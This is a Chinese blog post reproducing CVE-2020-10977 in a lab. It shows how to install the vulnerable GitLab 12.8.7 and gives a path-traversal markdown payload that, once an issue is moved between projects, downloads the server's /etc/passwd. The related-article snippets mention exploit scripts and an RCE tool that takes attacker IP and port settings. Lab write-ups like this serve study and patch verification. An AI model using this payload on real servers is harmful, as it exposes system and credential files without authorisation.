CVE-2020-10977 GitLab任意文件读取漏洞复现

最新推荐文章于 2024-07-16 01:05:44 发布
最新推荐文章于 2024-07-16 01:05:44 发布
阅读量1.5k 收藏 1
点赞数
文章标签: gitlab 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/akdjfhx/article/details/127883319
版权

一、gitlab受影响版本

GitLab GitLab CE/EE >=8.5 and <=12.9

二、gitlab12.8.7安装

1.首先在/etc/yum.repos.d/下新建一个名为gitlab-ce.repo的文件,内容为以下内容

[gitlab-ce]
​
name=Gitlab CE Repository
​
baseurl=https://mirrors.tuna.tsinghua.edu.cn/gitlab-ce/yum/el$releasever/
​
gpgcheck=0
​
enabled=1

 

2.使用以下命令安装带漏洞版本的gitlab

yum makecache


yum install gitlab-ce-12.8.7-ce.0.el7

3.在执行完成后,修改/etc/gitlab/gitlab.rb文件注释掉external_url ‘http://gitlab.example.com

4.保存退出后,使用命令gitlab-ctl reconfigure来进行安装,然后等待安装完成。

gitlab-ctl reconfigure

5.使用如下命令检测当前GitLab版本:

cat /opt/gitlab/embedded/service/gitlab-rails/VERSION

 

6.安装完成后,在浏览器直接访问IP即可

 

三、漏洞复现

1.登录后创建两个project

 

2.在一个project中创建一个issues,填入payload:

![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../../etc/passwd)

 

3.提交后,将这个创建好的issues move到前面创建好的project2中。

  

4.move完成后,从第二个project中可以看到passwd文件的连接地址,可以直接点击下载。

5.服务器/etc/passwd中的内容被下载到本地 

 

岁月标记
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
GitLab任意文件读取漏洞(CVE-2020-10977)POC
01-15
检测脚本
GitLab任意文件读取漏洞复现(CVE-2020-10977)
m0_48520508的博客
12-30 2202
0x00简介 GitLab 是一个用于仓库管理系统的开源项目,使用Git作为代码管理工具,并在此基础上搭建起来的web服务。GitLab是由GitLabInc.开发,使用MIT许可证的基于网络的Git仓库管理工具,且具有wiki和issue跟踪功能。使用Git作为代码管理工具,并在此基础上搭建起来的web服务。 0x01漏洞概述 在Gitlab 8.5-12.9版本中,存在一处任意文件读取漏洞,攻击者可以利用该漏洞,在不需要特权的状态下,读取任意文件,造成严重信息泄露,从而导致进一步被攻击的风险。 0x02
GitLab 任意文件读取漏洞复现CVE-2016-9086)】
qq_61947585的博客
07-06 331
GitLab是一套利用Ruby on Rails开发的开源应用程序,可实现一个自托管的Git(版本控制系统)项目仓库,它拥有与Github类似的功能,可查阅项目的文件内容、提交历史、Bug列表等。GitLab中的‘import/export project’功能中存在目录遍历漏洞,该漏洞源于程序没有正确检查用户提供文档中的符号链接。攻击者可利用该漏洞检索任意文件的内容。
GitLab 任意文件读取CVE-2016-9086)
ANOrange的博客
04-01 279
GitLab 是一个基于 Web 的 DevOps 生命周期工具,它提供了一个 Git 存储库管理器,提供 wiki、问题跟踪以及持续集成和部署管道功能。来自 HackerOne 的 Jobert Abma 披露了 GitLab 的“导入/导出项目”功能中的一个关键安全漏洞。在 GitLab 8.9 中添加了此功能,允许用户将其项目导出并重新导入为磁带存档文件 (tar)。8.13.0 之前的所有 GitLab 版本都将此功能限制为仅供管理员使用。从版本 8.13.0 开始,所有用户都可以使用此功能。
GitLab任意文件读取漏洞CVE-2020-10977复现
玄道的网安博客
12-01 3797
漏洞概述 GitLab是美国GitLab公司的一款使用Ruby on Rails开发的、自托管的、Git(版本控制系统)项目仓库应用程序。该程序可用于查阅项目的文件内容、提交历史、Bug列表等。 GitLab(企业版和社区版)12.9之前版本中存在路径遍历漏洞。该漏洞源于网络系统或产品未能正确地过滤资源或文件路径中的特殊元素。攻击者可利用该漏洞访问受限目录之外的位置。 影响版本 GitLab GitLab EE >=8.5,<=12.9 GitLab GitLab C...
CVE-2020-10977:Gitlab v12.4.0-8.1 RCE
05-07
URI= " https://target " TARGET_EMAIL_DOMAIN= " laboratory.htb " \ TARGET_USER= " test " TARGET_PASSWORD= " Test pass 123 " \ LOCAL_IP= " 10.10.14.142 " LOCAL_PORT= " 44044 " \ node gitlab_rce.js 可以...
GitLab任意文件读取漏洞CVE-2020-10977重现
cumt_TTR的专栏
11-27 2011
漏洞描述 地址: https://www.freebuf.com/vuls/235982.html Gitlab安装 官方地址: https://docs.gitlab.com/omnibus/docker/ 启动docker: 注意版本号,不要用最新版本,这个漏洞是有相关版本的 docker run --detach \ --hostname 192.168.1.22 \ --publish 9443:443 --publish 980:80 --publish 922:22 \ -
Gitlab 任意文件读取漏洞CVE-2016-9086)
EC_Carrot的博客
06-07 639
漏洞背景 GitLab是一套利用Ruby on Rails开发的开源应用程序,可实现一个自托管的Git(版本控制系统)项目仓库,它拥有与Github类似的功能,可查阅项目的文件内容、提交历史、Bug列表等。 GitLab中的‘import/export project’功能中存在目录遍历漏洞,该漏洞源于程序没有正确检查用户提供文档中的符号链接。攻击者可利用该漏洞检索任意文件的内容。 影响版本 GitLab CE和EE: 8.13.0至8.13.2版本 8.12.0至8.12.7版本 8.11.0至8.11
CVE-2020-10977-Gitlab RCE 任意文件读取导致远程命令执行漏洞-环境搭建及完整复现-exp-图文详细笔记
weixin_43311457的博客
10-29 3084
Gitlab任意文件读取导致远程命令执行 漏洞环境搭建-Centos7 1.安装依赖软件 yum -y install policycoreutils openssh-server openssh-clients postfix 2.设置postfix开机自启,并启动,postfix支持gitlab发信功能(对漏洞环境应该不重要) systemctl enable postfix && systemctl start postfix 3.下载gitlab安装包,然后安装 官方下载: CE
GitLab 目录遍历漏洞复现(CVE-2023-2825)
0xSec
05-27 3794
GitLab 存在目录遍历漏洞,当嵌套在至少五个组中的公共项目中存在附件时,未经身份验证的恶意用户可以利用该漏洞读取服务器上的任意文件
GitLab 任意文件读取漏洞CVE-2016-9086)
最新发布
m0_63082628的博客
07-16 421
GitLab是一个利用 Ruby on Rails 开发的开源应用程序,实现一个自托管的Git项目仓库,可通过Web界面进行访问公开的或者私人项目。它拥有与Github类似的功能,能够浏览源代码,管理缺陷和注释。可以管理团队对仓库的访问,它非常易于浏览提交过的版本并提供一个文件历史库。它还提供一个代码片段收集功能可以轻松实现代码复用,便于日后有需要的时候进行查找。简单来说,GitLab就是一个与github差不多的项目管理和代码托管平台。
CVE-2020-10977复现过程
weixin_39811856的博客
11-30 1760
老规矩上一下漏洞详情 漏洞详情: GitLab是美国GitLab公司的一款使用Ruby on Rails开发的、自托管的、Git(版本控制系统)项目仓库应用程序。该程序可用于查阅项目的文件内容、提交历史、Bug列表等。 GitLab(企业版和社区版)12.9之前版本中存在路径遍历漏洞。该漏洞源于网络系统或产品未能正确地过滤资源或文件路径中的特殊元素。攻击者可利用该漏洞访问受限目录之外的位置。 POC: #!/usr/bin/env python3 import sys import jso.
CVE-2022-1162 Gitlab 硬编码漏洞复现
热爱学习,喜欢折腾!
11-11 1956
GitLab 是一个用于仓库管理系统的开源项目,使用 Git 作为代码管理工具,可通过 Web 界面访问公开或私人项目。GitLab官方描述,系统会默认给使用了 OmniAuth 程序(例如 OAuth、LDAP、SAML)注册的帐户设置一个硬编码密码,从而允许攻击者可直接通过该硬编码密码登录并接管帐户。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值